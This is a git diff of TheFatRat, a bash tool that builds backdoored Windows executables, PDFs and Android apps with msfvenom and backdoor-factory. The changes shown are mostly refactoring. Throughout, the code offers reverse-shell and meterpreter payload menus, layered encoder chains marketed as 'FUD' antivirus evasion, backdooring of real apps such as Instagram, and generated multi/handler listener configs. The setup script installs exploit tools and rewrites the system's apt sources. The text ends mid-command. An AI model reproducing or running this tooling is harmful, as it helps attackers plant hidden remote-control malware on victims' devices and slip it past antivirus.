-rf $path/temp/* >/dev/null 2>&1 echo "[✔] Done!" -zenity --question --text="`printf "Do you want to create a listener for this configuration \n to use in msfconsole in future ?"`" -if [ $? = 0 ] ; then -save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="myapk"); -svf=$path/config/listeners/$save.rc -rm -rf $svf >/dev/null 2>&1 -echo "use exploit/multi/handler" > $svf -echo "set PAYLOAD $payload" >> $svf -echo "set LHOST $yourip" >> $svf -echo "set LPORT $yourport" >> $svf -echo "exploit -j" >> $svf -echo -e $okegreen "Configuration file saved to $list/$save.rc" -fi -echo -e $okegreen "" -read -rsp $'Press any key to return to fatrat menu\n' -n 1 key -echo -clear -menu -;; -*) -clear -menu +echo "" +crlst ;; esac } @@ -2720,11 +3771,12 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo echo -ne $okegreen" └─────► " ;tput sgr0 read fatrat1 - if test $fatrat1 == '1' #NUMBER 1 BEBE - then + case $fatrat1 in +1) echo "" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -2747,12 +3799,12 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp PwnWinds fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 - spinlong +pldwin +spinlong echo "" echo "" gboor @@ -2769,12 +3821,12 @@ fi echo -e $okegreen"" echo -e "Backdoor Saved To output Folder " PwnWinds - - elif test $fatrat1 == '2' #cPAGAR-POWERSHELL - then +;; +2) echo "" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" echo -e $okegreen "" @@ -2797,12 +3849,12 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp PwnWinds fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 - spinlong +pldwin +spinlong echo "" echo "" gboor @@ -2827,21 +3879,21 @@ fi echo -e $okegreen"" echo -e "Backdoor Saved To output Folder " echo "" - echo -ne " Press any key to continue ......... " + echo -ne " Press [ENTER] key to continue ......... " read continue PwnWinds - - elif test $fatrat1 == '3' #Apachecompler - then +;; +3) echo "" echo -e $okegreen"" echo -e $okegreen " Starting Apache Server wait ..." - service apache2 start > /dev/null 2>&1 + /etc/init.d/apache2 start > /dev/null 2>&1 echo "" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -2864,12 +3916,12 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp PwnWinds fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 - spinlong +pldwin +spinlong echo "" echo "" gboor @@ -2891,15 +3943,16 @@ fi echo -e $okegreen"" echo -e " Backdoor Saved To output Folder " echo "" - echo -ne " Press any key to continue ......... " + echo -ne " Press [ENTER] key to continue ......... " read continue PwnWinds - elif test $fatrat1 == '4' #C AJA - then +;; +4) echo "" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -2922,12 +3975,12 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp PwnWinds fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 - spinlong +pldwin +spinlong echo "" echo "" gboor @@ -2952,16 +4005,17 @@ fi echo -e $okegreen"" echo -e " Backdoor Saved To output Folder " echo "" - echo -ne " Press any key to continue ......... " + echo -ne " Press [ENTER] key to continue ......... " read continue PwnWinds - elif test $fatrat1 == '5' #PDF+POWERSHELL+C - then +;; +5) echo echo -e $yellow" Worked on Adobe Reader v8.x, v9.x / Windows XP SP3 / Windows 7/Vista ( English )" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -2984,7 +4038,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp PwnWinds fi @@ -2993,8 +4047,7 @@ fi read embedpdf if [ -z "$embedpdf" ]; then embedpdf="$path/PE/original.pdf" -fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 +fipldwin spinlong echo "" echo "" @@ -3023,15 +4076,16 @@ fi echo -e $okegreen"" echo -e $yellow" Backdoor PDF Saved To output Folder " echo "" - echo -ne $okegreen" Press any key to continue ......... " + echo -ne $okegreen" Press [ENTER] key to continue ......... " read continue PwnWinds - - elif test $fatrat1 == '6' #C Meteperter_reverse_tcp - then +fi +;; +6) echo "" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -3054,7 +4108,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp PwnWinds fi @@ -3249,11 +4303,12 @@ fi read aw PwnWinds - elif test $fatrat1 == '7' #C Staging Protocol Meteperter - then +;; +7) echo "" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -3276,7 +4331,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp PwnWinds fi @@ -3372,14 +4427,16 @@ fi read aw PwnWinds - elif test $fatrat1 == '8' - then +;; +8) clear menu - else +;; +*) PwnWinds -fi +;; +esac } @@ -3487,7 +4544,7 @@ read LABEL echo "" #Check for Metasploit -if [[ "$MSFVENOM" != "" || "$MSFCONSOLE" != "" ]]; then +if [[ "$msfvenom" != "" || "$msfconsole" != "" ]]; then echo "" else echo "" @@ -3501,7 +4558,8 @@ fi #ITER=`seq 5 10 |sort -R |sort -R | head -1` ITER=`shuf -i 10-20 -n 1` echo -e $okegreen"" -echo -e $yellow "Your local IP address is : $lanip" +echo -e $yellow "Your local IPV4 address is : $lanip" + echo -e $yellow "Your local IPV6 address is : $lanip6" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -3521,7 +4579,7 @@ invalid1 if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp avoid fi @@ -3533,7 +4591,7 @@ echo "" echo "" spinlong #Payload creater -$MSFVENOM -p "$PAYLOAD" LHOST="$yourip" LPORT="$yourport" EXITFUNC=thread -f raw | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -f raw 2>/dev/null | $MSFVENOM -e x86/jmp_call_additive -i $ITER -a x86 --platform linux -f raw 2>/dev/null | $MSFVENOM -e x86/call4_dword_xor -i $ITER -a x86 --platform win -f raw 2>/dev/null | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -a x86 --platform win -f c > msf.c 2>/dev/null +$msfvenom -p "$PAYLOAD" LHOST="$yourip" LPORT="$yourport" EXITFUNC=thread -f raw | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -f raw 2>/dev/null | $MSFVENOM -e x86/jmp_call_additive -i $ITER -a x86 --platform linux -f raw 2>/dev/null | $MSFVENOM -e x86/call4_dword_xor -i $ITER -a x86 --platform win -f raw 2>/dev/null | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -a x86 --platform win -f c > msf.c 2>/dev/null echo "" echo "" @@ -3592,7 +4650,7 @@ if [ "$LEVEL" = "1" ]; then echo "" spinlong2 SEED=$(shuf -i 100000-500000 -n 1) -echo -n -e $okegreen"Press any key to return to menu" +echo -n -e $okegreen"Press [ENTER] key to return to menu" read back clear menu @@ -3604,7 +4662,7 @@ elif [ "$LEVEL" = "2" ]; then echo "" spinlong2 SEED=$(shuf -i 1000000-5000000 -n 1) -echo -n -e $okegreen"Press any key to return to menu" +echo -n -e $okegreen"Press [ENTER] key to return to menu" read back clear menu @@ -3616,7 +4674,7 @@ elif [ "$LEVEL" = "3" ]; then echo "" spinlong2 SEED=$(shuf -i 8000000-12000000 -n 1) -echo -n -e $okegreen"Press any key to return to menu" +echo -n -e $okegreen"Press [ENTER] key to return to menu" read back clear menu @@ -3628,7 +4686,7 @@ elif [ "$LEVEL" = "4" ]; then echo "" spinlong2 SEED=$(shuf -i 40000000-60000000 -n 1) -echo -n -e $okegreen"Press any key to return to menu" +echo -n -e $okegreen"Press [ENTER] key to return to menu" read back clear menu @@ -3640,7 +4698,7 @@ elif [ "$LEVEL" = "5" ]; then echo "" spinlong2 SEED=$(shuf -i 100000000-200000000 -n 1) -echo -n -e $okegreen"Press any key to return to menu" +echo -n -e $okegreen"Press [ENTER] key to return to menu" read back clear menu @@ -3705,7 +4763,7 @@ rm build.c >/dev/null 2>&1 rm random >/dev/null 2>&1 rm msf.c >/dev/null 2>&1 rm msfhandler.rc >/dev/null 2>&1 -echo -n -e $okegreen"Press any key to return to menu" +echo -n -e $okegreen"Press [ENTER] key to return to menu" read back clear menu @@ -3736,12 +4794,14 @@ echo -e $white "http://www.linuxsec.org/" echo echo -e $red "Dana James Traversie - (backdoor-apk)" echo +echo -e $cyan "z0noxz - (powerstager)" +echo echo -e $white "peterpt" echo echo -e $red "Big Thanks to : http://www.github.com/" echo echo "" -echo -n -e $okegreen "Press any key to return to menu" +echo -n -e $okegreen "Press [ENTER] key to return to menu" read back clear menu @@ -3753,7 +4813,6 @@ clear ################################################################### menu () { clear - resize -s 46 76 > /dev/null echo -e $okegreen"" echo -e $okegreen" ____ " echo -e $okegreen" | | " @@ -3778,7 +4837,7 @@ menu () { echo -e $white " " echo -e $white" [$okegreen"01"$white]$okegreen Create Backdoor with msfvenom" - echo -e $white" [$okegreen"02"$white]$okegreen Create Fud 100% Backdoor [Slow but Powerfull] " + echo -e $white" [$okegreen"02"$white]$okegreen Create Fud 100% Backdoor with Fudwin 1.0" echo -e $white" [$okegreen"03"$white]$okegreen Create Fud Backdoor with Avoid v1.2 " echo -e $white" [$okegreen"04"$white]$okegreen Create Fud Backdoor with backdoor-factory [embed] " echo -e $white" [$okegreen"05"$white]$okegreen Backdooring Original apk [Instagram, Line,etc] " @@ -3804,10 +4863,7 @@ menu () { elif test $fatrat == '2' then - chmod +x powerfull.sh - xterm -fa monaco -fs 13 -bg black ./powerfull.sh -clear -menu + fudwin elif test $fatrat == '3' then @@ -3818,27 +4874,52 @@ menu echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" echo -e $okegreen"" - read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira; - embed=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your executable file"); - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "cave_miner_inline" FALSE "iat_reverse_tcp_inline" FALSE "iat_reverse_tcp_inline_threaded" FALSE "iat_reverse_tcp_stager_threaded" FALSE "iat_user_supplied_shellcode_threaded" FALSE "meterpreter_reverse_https_threaded" FALSE "reverse_shell_tcp_inline" FALSE "reverse_tcp_stager_threaded" FALSE "user_supplied_shellcode_threaded" --width 350 --height 300) > /dev/null 2>&1 - spinlong - if [ ! -f "$embed" ];then - echo -e $red "You did not setected any executable file" - read -ne " Press any key to return to menu ." - menu +if [ ! -f "$defcon" ] +then +yourip="" +yourport="" +fi + if [ -z "$yourip" ]; then + read -p ' Set LHOST IP: ' yourip fi - echo "" - echo "" + echo -e $okegreen "" + if [ -z "$yourport" ]; then + read -p ' Set LPORT: ' yourport + fi + read -p ' Please enter the base name for output files (ex : myapp : ' fira +invalid +if [ $err == "1" ] +then +echo -e $okegreen "" +echo -n "Press [ENTER] key to return to menu ." +read inp +menu +fi +selexe + pldbkf + echo "" gboor spinlong2 echo "" echo -e $okegreen"" - $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe - echo -e "Shell Saved To :($path/backdoored/output/$fira.exe) press any key to continue" + $backdoor -f $exef -s $payload -H $yourip -P $yourport -o output/$fira.exe +outf="$path/backdoored/output/$fira.exe" +if [ ! -f $outf ] +then +echo "" +echo -e $red "Backdoor factory was not able to compile your backdoor in the specific exe ." +echo "" +echo -n -e $okegreen"Press [ENTER] any key to return to menu" + read back +clear + menu +fi + echo -e "Shell Saved To :($path/backdoored/output/$fira.exe) press [ENTER] key to continue" read bebeku clear menu @@ -3938,7 +5019,7 @@ menu cd .. cd .. echo "" - echo -ne $red" [*] $cyan Folders cleaned, press any key to return to the main menu." + echo -ne $red" [*] $cyan Folders cleaned, Press [ENTER] key to return to the main menu." read anjeng menu @@ -3971,7 +5052,6 @@ fi # MENU FATRAT ################################################################### clear -resize -s 46 76 > /dev/null echo -e $okegreen"" echo -e $okegreen" ____ " echo -e $okegreen" | | " @@ -3996,7 +5076,7 @@ echo echo -e $white " " echo -e $white" [$okegreen"01"$white]$okegreen Create Backdoor with msfvenom" - echo -e $white" [$okegreen"02"$white]$okegreen Create Fud 100% Backdoor [Slow but Powerfull] " + echo -e $white" [$okegreen"02"$white]$okegreen Create Fud 100% Backdoor with Fudwin 1.0" echo -e $white" [$okegreen"03"$white]$okegreen Create Fud Backdoor with Avoid v1.2 " echo -e $white" [$okegreen"04"$white]$okegreen Create Fud Backdoor with backdoor-factory [embed] " echo -e $white" [$okegreen"05"$white]$okegreen Backdooring Original apk [Instagram, Line,etc] " @@ -4022,10 +5102,7 @@ echo elif test $fatrat == '2' then - chmod +x powerfull.sh - xterm -fa monaco -fs 13 -bg black ./powerfull.sh - clear - menu + fudwin elif test $fatrat == '3' then @@ -4033,34 +5110,47 @@ echo elif test $fatrat == '4' then - echo "" - spinlong - echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - echo -e $okegreen"" - read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira; - embed=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your executable file"); - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "cave_miner_inline" FALSE "iat_reverse_tcp_inline" FALSE "iat_reverse_tcp_inline_threaded" FALSE "iat_reverse_tcp_stager_threaded" FALSE "iat_user_supplied_shellcode_threaded" FALSE "meterpreter_reverse_https_threaded" FALSE "reverse_shell_tcp_inline" FALSE "reverse_tcp_stager_threaded" FALSE "user_supplied_shellcode_threaded" --width 350 --height 300) > /dev/null 2>&1 - spinlong - if [ ! -f "$embed" ];then - echo -e $red "You did not setected any executable file" - read -ne " Press any key to return to menu ." - menu - fi - echo "" - echo "" - gboor - spinlong2 - echo "" - echo -e $okegreen"" - $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe - echo -e "Shell Saved To :($path/backdoored/output/$fira.exe) press any key to continue" - read bebeku - clear - menu - + echo "" + spinlong + echo -e $okegreen"" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" + echo -e $yellow " Your public IP address is : $publicip" + echo -e $yellow " Your Hostname is : $hostn" + echo -e $okegreen"" +if [ ! -f "$defcon" ] +then +yourip="" +yourport="" +fi + if [ -z "$yourip" ]; then + read -p ' Set LHOST IP: ' yourip + fi + echo -e $okegreen "" + if [ -z "$yourport" ]; then + read -p ' Set LPORT: ' yourport + fi + read -p ' Please enter the base name for output files : ' fira +invalid +if [ $err == "1" ] +then +echo -e $okegreen "" +echo -n "Press [ENTER] key to return to menu ." +read inp +menu +fi +selexe + pldbkf + echo "" + gboor + spinlong2 + echo "" + echo -e $okegreen"" + $backdoor -f $exef -s $payload -H $yourip -P $yourport -o output/$fira.exe + echo -e "Shell Saved To :($path/backdoored/output/$fira.exe) press [ENTER] key to continue" + read bebeku + clear + menu elif test $fatrat == '5' then embedapk @@ -4156,7 +5246,7 @@ menu cd .. cd .. echo "" - echo -ne $red" [*] $cyan Folders cleaned, press any key to return to the main menu." + echo -ne $red" [*] $cyan Folders cleaned, press [ENTER] key to return to the main menu." read anjeng menu @@ -4184,4 +5274,4 @@ menu clear menu -fi +fi \ No newline at end of file diff --git a/powerfull.sh b/powerfull.sh old mode 100644 new mode 100755 index e94bfc9..fa7dbe1 --- a/powerfull.sh +++ b/powerfull.sh @@ -43,6 +43,7 @@ echo -e $okegreen "" #get user local ip , public ip & hostname into variables lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'` +lanip6=`ip addr | grep 'state UP' -A4 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'` publicip=`dig +short myip.opendns.com @resolver1.opendns.com` hostn=`host $publicip | awk '{print $5}' | sed 's/.$//'` @@ -129,7 +130,8 @@ echo -e $okegreen"" #input lhost and lport echo -e $okegreen"" -echo -e $yellow "Your local IP address is : $lanip" +echo -e $yellow "Your local IPV4 address is : $lanip" +echo -e $yellow "Your local IPV6 address is : $lanip6" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" diff --git a/setup.sh b/setup.sh index 82c2c73..03ada97 100644 --- a/setup.sh +++ b/setup.sh @@ -1,215 +1,358 @@ #!/bin/bash -# setup.sh Original Author : Edo maland ( Screetsec ) -# Script rebuilded by peterpt -# Install all dependencies nedded -# configuration all file for fixing all problems -# -------------------------------------------------------- +function ssplt() { - -#Fail safe for original user sources.list in case setup was interrupted in middle last time -file="/etc/apt/sources.list.fatrat" +# check if searchsploit exists +clear +which searchsploit > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Searchsploit......................[ found ]" +echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 +sleep 1 +else +echo -e $red "[ X ] searchsploit -> not found" +echo "" +echo -e $okegreen "Select one of the options bellow" +echo -e $orange "+-------------------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow Setup Searchsploit Path Manually$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow Install Searchsploit from Kali Repository$orange |" +echo -e $orange "+-------------------------------------------------+" +echo "" +echo -ne $okegreen "Option : ";tput sgr0 +read q1 +case $q1 in + +1) +echo "" +echo -e $green "Enter The Path of your Searchsploit instalation" +echo -e $cyan "ex : /opt/searchsploit/searchsploit" +echo "" +echo -ne $green "PATH : ";tput sgr0 +read msp +sspd="$msp" +if [ ! -f $sspd ] +then +echo "" +echo -e $red "It was not possible to found searchsploit executable in : $sspd" +echo "" +echo -e $green "Make sure you write the right path of your instalation" +echo "" +echo -e $okegreen "Press [ENTER] key to try again ." +read cont +ssplt +fi +echo "bash $sspd" | tee -a $config $log > /dev/null 2>&1 +chk="$path/logs/check" if [ -f "$file" ] then -echo "Setup Detected that your previous run was interrupted in middle , fixing your original repositories list ." -sleep 4s -rm -f /etc/apt/sources.list -mv /etc/apt/sources.list.fatrat /etc/apt/sources.list -echo "Your Original repository list was recovered. ;) ..... beginning setup" -echo "" -echo "Cleaning previous repositories cache & updating your repository ." -sudo apt-get clean && apt-get update -y -sleep 3s -else -echo "" -fi -path=`pwd` -arch=`uname -m` -log=$path/logs/setup.log -config=$path/config/config.path - -#Removing any previous setup log created -rm -f $log > /dev/null 2>&1 - -#This colour -cyan='\e[0;36m' -green='\e[0;32m' -lightgreen='\e[1;32m' -white='\e[1;37m' -red='\e[1;31m' -yellow='\e[1;33m' -blue='\e[1;34m' -purple='\e[1;35m' -path=`pwd` - -#Check root dulu -if [ $(id -u) != "0" ]; then -echo -e $red [x]::[not root]: You need to be [root] to run this script.; - echo "" - sleep 1 -exit 0 -fi -resize -s 80 103 > /dev/null 2>&1 +ct=`sed -n 1p $chk` +if [ "$ct" == "0" ]; then clear - -#Banner dong biar keren -echo -e $green "" -echo "___________ __ __________ __ " -echo "\_ _____/_____ _/ |_\______ \_____ _/ |_ " -echo " | __) \__ \ \ __\| _/\__ \ \ __\ " -echo " | \ / __ \_| | | | \ / __ \_| | " -echo " \___ / (____ /|__| |____|_ /(____ /|__| " -echo " \/ \/ \/ \/ " -echo " ____ ________ " -echo " /_ | / __ \ " -echo " | | \____ / " -echo " | | / / " -echo " |___| /\ /____/ " -echo " \/ " +echo -e $red "Fatrat was not able to install some packages" echo "" -echo -e $blue " Setup Script for FATRAT 1.9 " -touch $log -echo "------------------------------------------------------" >> $log -echo "| Tools paths configured in (setup.sh) for TheFatRat |" >> $log -echo "------------------------------------------------------" >> $log -echo " " >> $log +echo -e $blue "Reactivating you original repositories" +rm -f /etc/apt/sources.list +mv /etc/apt/sources.list.backup /etc/apt/sources.list +#now we can remove the emergency backup securely +rm -f /etc/apt/sources.list.fatrat +apt-get clean +xterm -T "☣ UPDATE YOUR REPO ☣" -geometry 100x30 -e "sudo apt-get update " +clear +echo -e $okegreen "Starting diagnostics" +chmod +x diag.sh +#./diag.sh +exit +elif [ "$ct" == "1" ]; then echo "" -echo -e $green "Checking for internet connection" -sleep 2 -ping -c 1 google.com > /dev/null 2>&1 - if [ "$?" != 0 ] - -then - - echo -e $red " You are not connected to the Internet" - echo -e $red " This script requires an active Internet connection" - echo -e $green "" - echo -e $green "Press any key to continue" - read abor - exit 0 - -else - echo -e $green "Internet connection detected !!" - echo "" - sleep 1 fi -case $arch in -x86_64|aarch64) -echo -e $purple " 64Bit OS detected" -echo "" +else +echo -e $okegreen "Something went very wrong , execute ./setup.sh again" +fi ;; -i386|i486|i586|i686|armv7l) -echo -e $blue " 32Bit OS detected" + +#ok +2) +echo -e $yellow "[ ! ] Installing Searchsploit " +xterm -T "☣ INSTALL SEARCHSPLOIT ☣" -geometry 100x30 -e "sudo apt-get install exploitdb --force-yes -y" +echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 +sleep 1 echo "" +chk="$path/logs/check" +if [ -f "$file" ] +then +ct=`sed -n 1p $chk` +if [ "$ct" == "0" ]; then +clear +echo -e $red "Fatrat was not able to install some packages" +echo "" +echo -e $blue "Reactivating you original repositories" +rm -f /etc/apt/sources.list +mv /etc/apt/sources.list.backup /etc/apt/sources.list +#now we can remove the emergency backup securely +rm -f /etc/apt/sources.list.fatrat +apt-get clean +xterm -T "☣ UPDATE YOUR REPO ☣" -geometry 100x30 -e "sudo apt-get update " +clear +echo -e $okegreen "Starting diagnostics" +chmod +x diag.sh +#./diag.sh +exit +elif [ "$ct" == "1" ]; then +echo "" +fi +else +echo -e $okegreen "Something went very wrong , execute ./setup.sh again" +fi ;; + *) -echo -e $red "Setup will not proceed because none of these archs were detected" -echo "" -echo -e $blue "x86_64|i386|i486|i586|i686|aarch64|armv7l" -echo "" -echo -e $green "Report this arch: $blue $arch $green into fatrat issues on github" -echo "" -echo -e "Press any key to continue" -read abor -exit 0 +ssplt ;; esac +fi +} +#ok +function bkf() { +clear +# Check if backdoor-factory exists + +which backdoor-factory > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Backdoor-Factory..................[ found ]" +echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 +sleep 1 +ssplt +else +echo -e $red "[ X ] backdoor-factory -> not found " +echo "" + +echo "" +echo -e $green "Select one of the options bellow" +echo -e $orange "+-----------------------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow Setup Backdoor-Factory Path Manually$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow Install Backdoor-Factory from Kali Repository$orange |" +echo -e $orange "+-----------------------------------------------------+" +echo "" +echo -ne $green "Option : ";tput sgr0 +read q2 +case $q2 in + +1) +echo "" +echo -e $green "Enter The Path of your backdoor-factory instalation" +echo -e $cyan "ex : /opt/backdoor-factory/backdoor.py" +echo "" +echo -ne $green "PATH : ";tput sgr0 +read msp +bkdf=$msp +if [ ! -f $bkdf ] +then +echo "" +echo -e $red "It was not possible to found backdoor-factory executable in : $bkdf" +echo "" +echo -e $green "Make sure you write the right path of your instalation" +echo "" +echo -e $green "Press [ENTER] key to try again ." +read cont +bkf +fi +echo "python2 $bkdf" | tee -a $config $log > /dev/null 2>&1 +ssplt +;; + +2) +echo -e $yellow "[ ! ] Installing backdoor-factory " +xterm -T "☣ INSTALL BACKDOOR-FACTORY ☣" -geometry 100x30 -e "sudo apt-get install backdoor-factory --force-yes -y" +echo -e $green "[ ✔ ] Done installing ...." +echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 +ssplt +;; + +*) +bkf +;; +esac +fi +} +#ok +function mtspl() { +clear +# check if metasploit-framework its installed +which msfconsole > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Metasploit-Framework..............[ found ]" +echo "msfconsole" | tee -a $config $log >> /dev/null 2>&1 +echo "msfvenom" | tee -a $config $log >> /dev/null 2>&1 +sleep 1 +bkf +else +echo -e $red "[ X ] metasploit-framework -> not found " + +# Providing manual input to user in case metasploit was installed from git and is not on system path + +echo "" +echo -e $okegreen "Select one of the options bellow" +echo -e $orange "+---------------------------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow Setup Metasploit Framework Path Manually$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow Install Metasploit Framework from Kali Repository$orange |" +echo -e $orange "+---------------------------------------------------------+" +echo "" +echo -ne $okegreen "Option : ";tput sgr0 +read q3 +case $q3 in +1) +echo "" +echo -e $green "Enter The Path of your metasploit instalation" +echo -e $cyan "ex : /opt/metasploit-framework" +echo "" +echo -ne $green "PATH : ";tput sgr0 +read msp +msfc=$msp/msfconsole +msfv=$msp/msfvenom +if [ ! -f $msfc ] +then +echo "" +echo -e $red "It was not possible to found msfconsole in : $msfc" +echo "" +echo -e $green "Make sure you write the right path of your instalation" +echo "" +echo -e $green "Press [ENTER] key to try again ." +read cont +mtspl +fi +if [ ! -f $msfv ] +then +echo "" +echo -e $red "It was not possible to found msfvenom in : $msfv" +echo "" +echo -e $green "Make sure you write the right path of your instalation" +echo "" +echo -e $green "Press [ENTER] key to try again ." +read cont +mtspl +fi +#Creation of symlinks to metasploit manual path in /usr/local/sbin to avoid changes in fatrat scripts + +unlink /usr/local/sbin/msfconsole > /dev/null 2>&1 +unlink /usr/local/sbin/msfvenom > /dev/null 2>&1 +ln -s $msfc /usr/local/sbin/msfconsole > 